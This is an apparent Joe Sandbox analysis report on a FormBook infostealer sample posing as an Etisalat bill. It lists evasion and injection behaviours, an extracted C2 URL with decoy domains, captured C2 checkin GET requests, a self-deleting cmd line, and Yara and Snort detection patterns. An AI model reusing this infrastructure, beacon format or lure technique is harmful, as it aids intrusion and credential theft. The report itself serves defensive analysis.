Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Details of Your Etisalat Summary Bill for the Month of May 2024.exe

Overview

General Information

Sample name:Details of Your Etisalat Summary Bill for the Month of May 2024.exe
Analysis ID:1448570
MD5:aa15c6bc55041b534268e0a07c5f0abc
SHA1:0b73953d2ea38ba9e4a996f96eb4426da818b854
SHA256:87f7f23776e3b70ce5a9f4095028edf855402cee27433be2b7d65c513cf25235
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: CMSTP Execution Process Creation
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Details of Your Etisalat Summary Bill for the Month of May 2024.exe (PID: 5772 cmdline: "C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe" MD5: AA15C6BC55041B534268E0A07C5F0ABC)
    • svchost.exe (PID: 4428 cmdline: "C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • cmstp.exe (PID: 1472 cmdline: "C:\Windows\SysWOW64\cmstp.exe" MD5: D7AABFAB5BEFD53BA3A27BD48F3CC675)
          • cmd.exe (PID: 6476 cmdline: /c del "C:\Windows\SysWOW64\svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.1wxir.com/da29/"], "decoy": ["kas-travel.com", "hy1618.net", "biosrch.com", "sharvellestudio.com", "56416.ooo", "953700958.com", "500051.com", "clic.coach", "veriosg.xyz", "aptsafety.com", "cucinaconestilo.com", "sercettopper.com", "diycoldplungetub.com", "hostingopinion.com", "mediatechnologysolutions.com", "nodogwifnohat.com", "ethpiee.com", "tragaperrasbares.com", "bbbcf.top", "jtxu6.top", "sorgulama95.shop", "myconc.pro", "okb-ar.net", "thanhdoanacademy.com", "rlyadventures.com", "maestrolipari.com", "digitaluxsolution.com", "zituahmed.com", "h5yfdgtg.top", "whalesnorkelingmirissa.online", "indxriim-firsaxtllari.com", "fopoliswhlvtjv.top", "iransarafan.com", "usedata.monster", "mnasjdqw66775jqwe09qwjsqwx.vip", "aphropay.com", "myfreedomlyfe.com", "vytennow.com", "micheleditrana.com", "babycarrot.fun", "maltepede.site", "618dfyy21.com", "flickzbiz.fun", "sshihi.top", "xsports108.com", "ideiastransformadoras.com", "aerotyneholdings.com", "expandyourbusinessdigital.com", "crown777login.com", "wheepexpress.com", "openshiftstore.com", "xzdkzsaczp.xyz", "cycmedb.com", "9sh3j02g8j.com", "cemeku.sydney", "functionalfossils.com", "kenguru.ink", "classicsty.com", "directadz.com", "scuffedwrapz.com", "oxmoz.art", "rusticstores.com", "vietcadao.com", "ai-infinite.net"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18839:$sqlite3step: 68 34 1C 7B E1
      • 0x1894c:$sqlite3step: 68 34 1C 7B E1
      • 0x18868:$sqlite3text: 68 38 2A 90 C5
      • 0x1898d:$sqlite3text: 68 38 2A 90 C5
      • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 34 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          2.2.svchost.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          2.2.svchost.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a39:$sqlite3step: 68 34 1C 7B E1
          • 0x17b4c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a68:$sqlite3text: 68 38 2A 90 C5
          • 0x17b8d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 15 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: CMSTP Execution Process Creation
          Source: Process startedAuthor: Nik Seetharaman: Data: Command: /c del "C:\Windows\SysWOW64\svchost.exe", CommandLine: /c del "C:\Windows\SysWOW64\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\cmstp.exe", ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 1472, ParentProcessName: cmstp.exe, ProcessCommandLine: /c del "C:\Windows\SysWOW64\svchost.exe", ProcessId: 6476, ProcessName: cmd.exe
          Sigma detected: Uncommon Svchost Parent Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe", CommandLine: "C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe", ParentImage: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe, ParentProcessId: 5772, ParentProcessName: Details of Your Etisalat Summary Bill for the Month of May 2024.exe, ProcessCommandLine: "C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe", ProcessId: 4428, ProcessName: svchost.exe
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe", CommandLine: "C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe", ParentImage: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe, ParentProcessId: 5772, ParentProcessName: Details of Your Etisalat Summary Bill for the Month of May 2024.exe, ProcessCommandLine: "C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe", ProcessId: 4428, ProcessName: svchost.exe

          Snort Signatures

          Timestamp:05/28/24-15:08:47.165398
          SID:2031412
          Source Port:49710
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-15:12:15.071010
          SID:2031412
          Source Port:49716
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-15:09:06.832730
          SID:2031412
          Source Port:49711
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-15:09:27.255123
          SID:2031412
          Source Port:49712
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-15:11:10.766263
          SID:2031412
          Source Port:49715
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-15:10:29.038585
          SID:2031412
          Source Port:49714
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.1wxir.com/da29/"], "decoy": ["kas-travel.com", "hy1618.net", "biosrch.com", "sharvellestudio.com", "56416.ooo", "953700958.com", "500051.com", "clic.coach", "veriosg.xyz", "aptsafety.com", "cucinaconestilo.com", "sercettopper.com", "diycoldplungetub.com", "hostingopinion.com", "mediatechnologysolutions.com", "nodogwifnohat.com", "ethpiee.com", "tragaperrasbares.com", "bbbcf.top", "jtxu6.top", "sorgulama95.shop", "myconc.pro", "okb-ar.net", "thanhdoanacademy.com", "rlyadventures.com", "maestrolipari.com", "digitaluxsolution.com", "zituahmed.com", "h5yfdgtg.top", "whalesnorkelingmirissa.online", "indxriim-firsaxtllari.com", "fopoliswhlvtjv.top", "iransarafan.com", "usedata.monster", "mnasjdqw66775jqwe09qwjsqwx.vip", "aphropay.com", "myfreedomlyfe.com", "vytennow.com", "micheleditrana.com", "babycarrot.fun", "maltepede.site", "618dfyy21.com", "flickzbiz.fun", "sshihi.top", "xsports108.com", "ideiastransformadoras.com", "aerotyneholdings.com", "expandyourbusinessdigital.com", "crown777login.com", "wheepexpress.com", "openshiftstore.com", "xzdkzsaczp.xyz", "cycmedb.com", "9sh3j02g8j.com", "cemeku.sydney", "functionalfossils.com", "kenguru.ink", "classicsty.com", "directadz.com", "scuffedwrapz.com", "oxmoz.art", "rusticstores.com", "vietcadao.com", "ai-infinite.net"]}
          Multi AV Scanner detection for submitted file
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exeReversingLabs: Detection: 36%
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1977959282.00000000015F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4436014928.0000000004AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2040525225.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2040267539.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4435949458.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2040356604.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
          Machine Learning detection for sample
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exeJoe Sandbox ML: detected
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: cmstp.pdbGCTL source: svchost.exe, 00000002.00000002.2040771294.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2038761767.0000000002A1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2039335418.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000004.00000002.4435336797.0000000000AD0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe, 00000000.00000003.1976844124.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, Details of Your Etisalat Summary Bill for the Month of May 2024.exe, 00000000.00000003.1975898601.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2041143443.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1977047495.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2041143443.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1980836270.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000004.00000002.4436345612.0000000004D00000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000004.00000003.2042686999.0000000004B4C000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000004.00000002.4436345612.0000000004E9E000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000004.00000003.2040176721.0000000004991000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe, 00000000.00000003.1976844124.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, Details of Your Etisalat Summary Bill for the Month of May 2024.exe, 00000000.00000003.1975898601.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2041143443.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1977047495.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2041143443.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1980836270.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, cmstp.exe, 00000004.00000002.4436345612.0000000004D00000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000004.00000003.2042686999.0000000004B4C000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000004.00000002.4436345612.0000000004E9E000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000004.00000003.2040176721.0000000004991000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: cmstp.pdb source: svchost.exe, 00000002.00000002.2040771294.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2038761767.0000000002A1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2039335418.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, cmstp.exe, 00000004.00000002.4435336797.0000000000AD0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.4443581289.00000000110AF000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000004.00000002.4436826766.000000000524F000.00000004.10000000.00040000.00000000.sdmp, cmstp.exe, 00000004.00000002.4435700225.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.4443581289.00000000110AF000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000004.00000002.4436826766.000000000524F000.00000004.10000000.00040000.00000000.sdmp, cmstp.exe, 00000004.00000002.4435700225.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BC4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00BC4696
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BCC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00BCC9C7
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BCC93C FindFirstFileW,FindClose,0_2_00BCC93C
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BCF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00BCF200
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BCF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00BCF35D
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BCF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00BCF65E
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BC3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00BC3A2B
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BC3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00BC3D4E
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BCBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00BCBF27
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00ADB3C4 memset,GetPrivateProfileStringW,FindFirstFileW,memset,FindNextFileW,4_2_00ADB3C4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00AD894B memset,memset,memset,SHGetFolderPathW,memset,SHGetFolderPathW,CmFree,memset,FindFirstFileW,GetLastError,memset,memset,FindNextFileW,FindClose,4_2_00AD894B

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49710 -> 103.224.212.212:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49711 -> 76.223.105.230:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49712 -> 13.248.169.48:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49714 -> 169.239.128.46:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49715 -> 45.137.159.230:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49716 -> 155.248.232.116:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.212 80Jump to behavior
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.1wxir.com/da29/
          Source: global trafficHTTP traffic detected: GET /da29/?6l=Q7am8il/nsWle9qVrlpo40N7hUEpDQa8XY45vE38HJwrUpInQsvntdacZL4kVj7U+7+N&2dqhl=R2MlVxP8ert HTTP/1.1Host: www.vietcadao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /da29/?2dqhl=R2MlVxP8ert&6l=6/Esq9Rm48kCgFtfi/klaXziz5v2BYMU9Gqu5IdnDsAA8ndWs6SyEuImZhHevj0yCJMb HTTP/1.1Host: www.micheleditrana.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /da29/?6l=zMkbXlAjBAhUzX2IHy11bPpbi+JoISa3f3VK09dwhIavwNJbYx88ATU2pMBs24q8oQzA&2dqhl=R2MlVxP8ert HTTP/1.1Host: www.aerotyneholdings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /da29/?2dqhl=R2MlVxP8ert&6l=R0vht/u//GQkKJnhnDzhccCvBPqy5ItmLDFelNY6QmkspbEKZfPP+/bGeDfLPfj4cOFx HTTP/1.1Host: www.1wxir.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /da29/?2dqhl=R2MlVxP8ert&6l=IK1SFyt5vgXTEdWXyzXhj/+ddmg0nYKJwLobMWZqnGcsuxwYcVM7IV3LfBY9TbKtfD67 HTTP/1.1Host: www.myconc.proConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 103.224.212.212 103.224.212.212
          Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
          Source: Joe Sandbox ViewIP Address: 190.115.24.78 190.115.24.78
          Source: Joe Sandbox ViewASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: DDOS-GUARDCORPBZ DDOS-GUARDCORPBZ
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: ZAPPIE-HOST-ASZappieHostGB ZAPPIE-HOST-ASZappieHostGB
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exeCode function: 0_2_00BD25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00BD25E2
          Source: global trafficHTTP traffic detected: GET /da29/?6l=Q7am8il/nsWle9qVrlpo40N7hUEpDQa8XY45vE38HJwrUpInQsvntdacZL4kVj7U+7+N&2dqhl=R2MlVxP8ert HTTP/1.1Host: www.vietcadao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /da29/?2dqhl=R2MlVxP8ert&6l=6/Esq9Rm48kCgFtfi/klaXziz5v2BYMU9Gqu5IdnDsAA8ndWs6SyEuImZhHevj0yCJMb HTTP/1.1Host: www.micheleditrana.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /da29/?6l=zMkbXlAjBAhUzX2IHy11bPpbi+JoISa3f3VK09dwhIavwNJbYx88ATU2pMBs24q8oQzA&2dqhl=R2MlVxP8ert HTTP/1.1Host: www.aerotyneholdings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
